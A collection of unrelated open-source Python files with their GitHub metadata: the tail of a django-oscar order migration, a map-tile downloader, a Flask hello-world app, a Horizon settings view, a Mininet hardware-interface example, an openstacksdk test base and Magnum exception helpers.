'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'event_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['customer.CommunicationEventType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'communication_events'", 'to': u"orm['order.Order']"})
},
u'order.line': {
'Meta': {'object_name': 'Line'},
'est_dispatch_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line_price_before_discounts_excl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'line_price_before_discounts_incl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'line_price_excl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'line_price_incl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'lines'", 'to': u"orm['order.Order']"}),
'partner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'order_lines'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['partner.Partner']"}),
'partner_line_notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'partner_line_reference': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'partner_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'partner_sku': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Product']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'quantity': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'stockrecord': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['partner.StockRecord']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'unit_cost_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'unit_price_excl_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'unit_price_incl_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'unit_retail_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'upc': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'})
},
u'order.lineattribute': {
'Meta': {'object_name': 'LineAttribute'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attributes'", 'to': u"orm['order.Line']"}),
'option': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'line_attributes'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['catalogue.Option']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'order.lineprice': {
'Meta': {'ordering': "('id',)", 'object_name': 'LinePrice'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'prices'", 'to': u"orm['order.Line']"}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'line_prices'", 'to': u"orm['order.Order']"}),
'price_excl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'price_incl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'quantity': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'shipping_excl_tax': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '12', 'decimal_places': '2'}),
'shipping_incl_tax': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '12', 'decimal_places': '2'})
},
u'order.order': {
'Meta': {'ordering': "['-date_placed']", 'object_name': 'Order'},
'basket': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['basket.Basket']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'billing_address': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['order.BillingAddress']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'GBP'", 'max_length': '12'}),
'date_placed': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
'guest_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'shipping_address': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['order.ShippingAddress']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'shipping_code': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'blank': 'True'}),
'shipping_excl_tax': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '12', 'decimal_places': '2'}),
'shipping_incl_tax': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '12', 'decimal_places': '2'}),
'shipping_method': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'total_excl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'total_incl_tax': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'orders'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['{}']".format(AUTH_USER_MODEL)})
},
u'order.orderdiscount': {
'Meta': {'object_name': 'OrderDiscount'},
'amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '12', 'decimal_places': '2'}),
'category': ('django.db.models.fields.CharField', [], {'default': "'Basket'", 'max_length': '64'}),
'frequency': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'offer_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'offer_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'discounts'", 'to': u"orm['order.Order']"}),
'voucher_code': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'voucher_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'order.ordernote': {
'Meta': {'object_name': 'OrderNote'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'note_type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'notes'", 'to': u"orm['order.Order']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['{}']".format(AUTH_USER_MODEL), 'null': 'True'})
},
u'order.paymentevent': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'PaymentEvent'},
'amount': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'event_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['order.PaymentEventType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lines': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['order.Line']", 'through': u"orm['order.PaymentEventQuantity']", 'symmetrical': 'False'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'payment_events'", 'to': u"orm['order.Order']"}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'shipping_event': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'payment_events'", 'null': 'True', 'to': u"orm['order.ShippingEvent']"})
},
u'order.paymenteventquantity': {
'Meta': {'object_name': 'PaymentEventQuantity'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'line_quantities'", 'to': u"orm['order.PaymentEvent']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'payment_event_quantities'", 'to': u"orm['order.Line']"}),
'quantity': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'order.paymenteventtype': {
'Meta': {'ordering': "('name',)", 'object_name': 'PaymentEventType'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
u'order.shippingaddress': {
'Meta': {'object_name': 'ShippingAddress'},
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['address.Country']"}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'line1': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'line2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'line3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'line4': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'phone_number': ('oscar.models.fields.PhoneNumberField', [], {'max_length': '128', 'blank': 'True'}),
'postcode': ('oscar.models.fields.UppercaseCharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'search_text': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'})
},
u'order.shippingevent': {
'Meta': {'ordering': "['-date_created']", 'object_name': 'ShippingEvent'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'event_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['order.ShippingEventType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lines': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'shipping_events'", 'symmetrical': 'False', 'through': u"orm['order.ShippingEventQuantity']", 'to': u"orm['order.Line']"}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shipping_events'", 'to': u"orm['order.Order']"})
},
u'order.shippingeventquantity': {
'Meta': {'object_name': 'ShippingEventQuantity'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'line_quantities'", 'to': u"orm['order.ShippingEvent']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shipping_event_quantities'", 'to': u"orm['order.Line']"}),
'quantity': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'order.shippingeventtype': {
'Meta': {'ordering': "('name',)", 'object_name': 'ShippingEventType'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
u'partner.partner': {
'Meta': {'object_name': 'Partner'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'partners'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['{}']".format(AUTH_USER_MODEL)})
},
u'partner.stockrecord': {
'Meta': {'unique_together': "(('partner', 'partner_sku'),)", 'object_name': 'StockRecord'},
'cost_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'low_stock_threshold': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'num_allocated': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'num_in_stock': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'partner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stockrecords'", 'to': u"orm['partner.Partner']"}),
'partner_sku': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'price_currency': ('django.db.models.fields.CharField', [], {'default': "'GBP'", 'max_length': '12'}),
'price_excl_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'price_retail': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stockrecords'", 'to': u"orm['catalogue.Product']"})
},
u'sites.site': {
'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'voucher.voucher': {
'Meta': {'object_name': 'Voucher'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'date_created': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'num_basket_additions': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'num_orders': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offers': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'vouchers'", 'symmetrical': 'False', 'to': u"orm['offer.ConditionalOffer']"}),
'start_date': ('django.db.models.fields.DateField', [], {}),
'total_discount': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'}),
'usage': ('django.db.models.fields.CharField', [], {'default': "'Multi-use'", 'max_length': '128'})
}
}
complete_apps = ['order']
|
{
"content_hash": "2d0f0a59ff0db57d42c745257aa499f2",
"timestamp": "",
"source": "github",
"line_count": 480,
"max_line_length": 238,
"avg_line_length": 93.45416666666667,
"alnum_prop": 0.5573141914485711,
"repo_name": "elliotthill/django-oscar",
"id": "b90cc13da20f03f7bebfcff6769a3ff6e231c6f8",
"size": "44882",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oscar/apps/order/migrations/0023_rename_basket_field.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1099824"
},
{
"name": "JavaScript",
"bytes": "818932"
},
{
"name": "Puppet",
"bytes": "3507"
},
{
"name": "Python",
"bytes": "4153712"
},
{
"name": "Shell",
"bytes": "4738"
},
{
"name": "XSLT",
"bytes": "49764"
}
],
"symlink_target": ""
}
|
from sys import argv
import os
import math
import urllib2
import time
import random
def deg2num(lat_deg, lon_deg, zoom):
lat_rad = math.radians(lat_deg)
n = 2.0 ** zoom
xtile = int((lon_deg + 180.0) / 360.0 * n)
ytile = int((1.0 - math.log(math.tan(lat_rad) + (1 / math.cos(lat_rad))) / math.pi) / 2.0 * n)
return (xtile, ytile)
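# Sanity check for the slippy-map tile math above: at zoom 0 the whole
# world is a single tile, and (0.0, 0.0) at zoom 1 lands in the
# south-east quadrant tile:
# >>> deg2num(0.0, 0.0, 0)
# (0, 0)
# >>> deg2num(0.0, 0.0, 1)
# (1, 1)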
def download_url(zoom, xtile, ytile, download_path):
    # Spread requests across the four CDN subdomains (1-4)
subdomain = random.randint(1, 4)
url = "http://%d.basemaps.cartocdn.com/dark_all/%d/%d/%d.png" % (subdomain, zoom, xtile, ytile)
dir_path = "%s/tiles/%d/%d/" % (download_path, zoom, xtile)
download_path = "%s/tiles/%d/%d/%d.png" % (download_path, zoom, xtile, ytile)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
if os.path.exists(download_path):
print "already downloaded %r" % url
else:
print "downloading %r" % url
time.sleep(1)
source = urllib2.urlopen(url)
content = source.read()
source.close()
destination = open(download_path,'wb')
destination.write(content)
destination.close()
def main(argv):
try:
south = 52.0
west = 20.7
north = 52.4
east = 21.3
min_zoom = 15
max_zoom = 16
download_path = "./"
except:
exit(2)
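    # Tile y grows southward, so deg2num(south, west) yields the larger
    # ytile; the y loop below therefore steps downward to the north edge.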
for zoom in range(int(min_zoom), int(max_zoom) + 1, 1):
xtile, ytile = deg2num(float(south), float(west), float(zoom))
final_xtile, final_ytile = deg2num(float(north), float(east), float(zoom))
for x in range(xtile, final_xtile + 1, 1):
for y in range(ytile, final_ytile - 1, -1):
download_url(int(zoom), x, y, download_path)
return 0
main(argv)
|
{
"content_hash": "a0392df2f16f8f14ff144ad2d9d1cee1",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 96,
"avg_line_length": 25.737704918032787,
"alnum_prop": 0.6535031847133758,
"repo_name": "ipepe/rails-real-tram-map",
"id": "3a23237cf58dce47ba093b056e72d43580fb6f58",
"size": "1595",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/download_tiles.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "32"
},
{
"name": "CSS",
"bytes": "2501"
},
{
"name": "HTML",
"bytes": "12558"
},
{
"name": "JavaScript",
"bytes": "8893"
},
{
"name": "Python",
"bytes": "1595"
},
{
"name": "Ruby",
"bytes": "26828"
},
{
"name": "Shell",
"bytes": "5653"
}
],
"symlink_target": ""
}
|
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
if __name__ == "__main__":
app.run()
|
{
"content_hash": "72927ff4bd62e2f2be4acf0202783bec",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 26,
"avg_line_length": 13.272727272727273,
"alnum_prop": 0.547945205479452,
"repo_name": "talapus/Ophidian",
"id": "d71338e01739b738a922cbf289a01c0df3c788db",
"size": "146",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Flask_fu/hello.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "154649"
},
{
"name": "JavaScript",
"bytes": "3364"
},
{
"name": "Python",
"bytes": "314611"
},
{
"name": "Shell",
"bytes": "16809"
}
],
"symlink_target": ""
}
|
from django.conf import settings
from horizon import forms
from horizon.utils import functions as utils
from openstack_dashboard.dashboards.settings.user import forms as user_forms
class UserSettingsView(forms.ModalFormView):
form_class = user_forms.UserSettingsForm
template_name = 'settings/user/settings.html'
def get_initial(self):
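        # Each setting falls back from the session value to the cookie
        # to a sensible default.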
return {
'language': self.request.session.get(
settings.LANGUAGE_COOKIE_NAME,
self.request.COOKIES.get(settings.LANGUAGE_COOKIE_NAME,
self.request.LANGUAGE_CODE)),
'timezone': self.request.session.get(
'django_timezone',
self.request.COOKIES.get('django_timezone', 'UTC')),
'pagesize': utils.get_page_size(self.request)}
def form_valid(self, form):
return form.handle(self.request, form.cleaned_data)
|
{
"content_hash": "0ab668f58f10213ffb00b2082a54cdcd",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 76,
"avg_line_length": 38.125,
"alnum_prop": 0.6437158469945355,
"repo_name": "spandanb/horizon",
"id": "bd551f74bc362c56443509f2db0d65d6cbe69554",
"size": "1520",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "openstack_dashboard/dashboards/settings/user/views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
"""
This example shows how to add an interface (for example a real
hardware interface) to a network after the network is created.
"""
import re, sys
from mininet.cli import CLI
from mininet.log import setLogLevel, info, error
from mininet.net import Mininet
from mininet.link import Intf
from mininet.topolib import TreeTopo
from mininet.util import quietRun
def checkIntf( intf ):
"Make sure intf exists and is not configured."
if ( ' %s:' % intf ) not in quietRun( 'ip link show' ):
error( 'Error:', intf, 'does not exist!\n' )
exit( 1 )
ips = re.findall( r'\d+\.\d+\.\d+\.\d+', quietRun( 'ifconfig ' + intf ) )
if ips:
        error( 'Error:', intf, 'has an IP address, '
               'and is probably in use!\n' )
exit( 1 )
if __name__ == '__main__':
setLogLevel( 'info' )
# try to get hw intf from the command line; by default, use eth1
intfName = sys.argv[ 1 ] if len( sys.argv ) > 1 else 'eth1'
info( '*** Connecting to hw intf: %s' % intfName )
info( '*** Checking', intfName, '\n' )
checkIntf( intfName )
info( '*** Creating network\n' )
net = Mininet( topo=TreeTopo( depth=1, fanout=2 ) )
switch = net.switches[ 0 ]
info( '*** Adding hardware interface', intfName, 'to switch',
switch.name, '\n' )
_intf = Intf( intfName, node=switch )
info( '*** Note: you may need to reconfigure the interfaces for '
'the Mininet hosts:\n', net.hosts, '\n' )
net.start()
CLI( net )
net.stop()
|
{
"content_hash": "c2205740ba96978423ede842812e2e3b",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 77,
"avg_line_length": 31,
"alnum_prop": 0.6063199473337723,
"repo_name": "5GExchange/escape",
"id": "1e010fd35ff409f146546c161cb9a38bb490a190",
"size": "1538",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mininet/examples/hwintf.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "381"
},
{
"name": "C",
"bytes": "9773701"
},
{
"name": "C++",
"bytes": "1144774"
},
{
"name": "Dockerfile",
"bytes": "4497"
},
{
"name": "HTML",
"bytes": "423218"
},
{
"name": "JavaScript",
"bytes": "9048"
},
{
"name": "Makefile",
"bytes": "121260"
},
{
"name": "Objective-C",
"bytes": "2964"
},
{
"name": "Python",
"bytes": "2856844"
},
{
"name": "Roff",
"bytes": "80820"
},
{
"name": "Shell",
"bytes": "190566"
}
],
"symlink_target": ""
}
|
import os
import time
import unittest
from openstack import connection
from openstack import exceptions
from openstack import service_filter
def requires_service(**kwargs):
"""Check whether a service is available for this test
When the service exists, the test will be run as normal.
When the service does not exist, the test will be skipped.
Usage:
@requires_service(service_type="identity", version="v3")
def test_v3_auth(self):
...
:param kwargs: The kwargs needed to create a
:class:`~openstack.service_filter.ServiceFilter`.
:returns: The test result if the test is executed.
:raises: SkipTest, which is handled by the test runner.
"""
def wrap(method):
def check(self):
try:
self.conn.authenticator.get_endpoint(
self.conn.transport,
service_filter.ServiceFilter(**kwargs))
return method(self)
except exceptions.EndpointNotFound as exc:
                self.skipTest(exc.message)
return check
return wrap
class BaseFunctionalTest(unittest.TestCase):
class Opts(object):
def __init__(self):
self.cloud = os.getenv('OS_CLOUD', 'test_cloud')
@classmethod
def setUpClass(cls):
opts = cls.Opts()
cls.conn = connection.from_config(opts)
@classmethod
def assertIs(cls, expected, actual):
if expected != actual:
raise Exception(expected + ' != ' + actual)
@classmethod
def linger_for_delete(cls):
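        # Give the cloud a grace period to finish asynchronous deletes
        # before the next test starts.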
time.sleep(40)
|
{
"content_hash": "ce1a4c6ff1cdcdc89faea045146b41d9",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 68,
"avg_line_length": 28.017543859649123,
"alnum_prop": 0.6224170319348779,
"repo_name": "dudymas/python-openstacksdk",
"id": "c9765307be3a3713fe9064d6e35c6a10869f84ae",
"size": "2143",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "openstack/tests/functional/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1062098"
},
{
"name": "Shell",
"bytes": "1383"
}
],
"symlink_target": ""
}
|
"""Magnum base exception handling.
Includes decorator for re-raising Magnum-type exceptions.
"""
import functools
import sys
import uuid
from keystoneclient import exceptions as keystone_exceptions
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
import pecan
import six
import wsme
from magnum.common import safe_utils
from magnum.i18n import _
from magnum.i18n import _LE
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
try:
CONF.import_opt('fatal_exception_format_errors',
'oslo_versionedobjects.exception')
except cfg.NoSuchOptError as e:
    # Note: work around for magnum running against the master branch
    # in the devstack gate job, as magnum is not branched yet.
    # Different kilo/master versions of oslo.versionedobjects can
    # cause an issue here, as the option's import group changed, so
    # handle it here before branching to prevent gate failure.
    # Bug: #1447873
CONF.import_opt('fatal_exception_format_errors',
'oslo_versionedobjects.exception',
group='oslo_versionedobjects')
def wrap_exception(notifier=None, event_type=None):
"""This decorator wraps a method to catch any exceptions.
It logs the exception as well as optionally sending
it to the notification system.
"""
def inner(f):
def wrapped(self, context, *args, **kw):
# Don't store self or context in the payload, it now seems to
# contain confidential information.
try:
return f(self, context, *args, **kw)
except Exception as e:
with excutils.save_and_reraise_exception():
if notifier:
call_dict = safe_utils.getcallargs(f, context,
*args, **kw)
payload = dict(exception=e,
private=dict(args=call_dict)
)
temp_type = event_type
if not temp_type:
# If f has multiple decorators, they must use
# functools.wraps to ensure the name is
# propagated.
temp_type = f.__name__
notifier.error(context, temp_type, payload)
return functools.wraps(f)(wrapped)
return inner
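# Hypothetical usage sketch (handler and notifier names are
# illustrative, not part of this module):
#
#   class ConductorHandler(object):
#       @wrap_exception(notifier=my_notifier, event_type='bay.create')
#       def bay_create(self, context, bay):
#           ...
#
# Any exception raised by bay_create is re-raised after being reported
# to my_notifier as an error notification with the call arguments attached.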
OBFUSCATED_MSG = _('Your request could not be handled '
'because of a problem in the server. '
'Error Correlation id is: %s')
def wrap_controller_exception(func, func_server_error, func_client_error):
"""This decorator wraps controllers methods to handle exceptions:
- if an unhandled Exception or a MagnumException with an error code >=500
is catched, raise a http 5xx ClientSideError and correlates it with a log
message
- if a MagnumException is catched and its error code is <500, raise a http
4xx and logs the excp in debug mode
"""
@functools.wraps(func)
def wrapped(*args, **kw):
try:
return func(*args, **kw)
except Exception as excp:
if isinstance(excp, MagnumException):
http_error_code = excp.code
else:
http_error_code = 500
if http_error_code >= 500:
# log the error message with its associated
# correlation id
log_correlation_id = str(uuid.uuid4())
LOG.error(_LE("%(correlation_id)s:%(excp)s") %
{'correlation_id': log_correlation_id,
'excp': str(excp)})
# raise a client error with an obfuscated message
func_server_error(log_correlation_id, http_error_code)
else:
                # raise a client error with the original message
LOG.debug(excp)
func_client_error(excp, http_error_code)
return wrapped
def wrap_wsme_controller_exception(func):
"""This decorator wraps wsme controllers to handle exceptions."""
def _func_server_error(log_correlation_id, status_code):
raise wsme.exc.ClientSideError(
six.text_type(OBFUSCATED_MSG % log_correlation_id), status_code)
def _func_client_error(excp, status_code):
raise wsme.exc.ClientSideError(six.text_type(excp), status_code)
return wrap_controller_exception(func,
_func_server_error,
_func_client_error)
def wrap_pecan_controller_exception(func):
"""This decorator wraps pecan controllers to handle exceptions."""
def _func_server_error(log_correlation_id, status_code):
pecan.response.status = status_code
pecan.response.text = six.text_type(OBFUSCATED_MSG %
log_correlation_id)
def _func_client_error(excp, status_code):
pecan.response.status = status_code
pecan.response.text = six.text_type(excp)
pecan.response.content_type = None
return wrap_controller_exception(func,
_func_server_error,
_func_client_error)
def wrap_keystone_exception(func):
"""Wrap keystone exceptions and throw Magnum specific exceptions."""
@functools.wraps(func)
def wrapped(*args, **kw):
try:
return func(*args, **kw)
except keystone_exceptions.AuthorizationFailure:
raise AuthorizationFailure(
client=func.__name__, message="reason: %s" % sys.exc_info()[1])
except keystone_exceptions.ClientException:
raise AuthorizationFailure(
client=func.__name__,
message="unexpected keystone client error occurred: %s"
% sys.exc_info()[1])
return wrapped
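# Hypothetical usage sketch (the decorated function is illustrative):
#
#   @wrap_keystone_exception
#   def get_trust(client, trust_id):
#       return client.trusts.get(trust_id)
#
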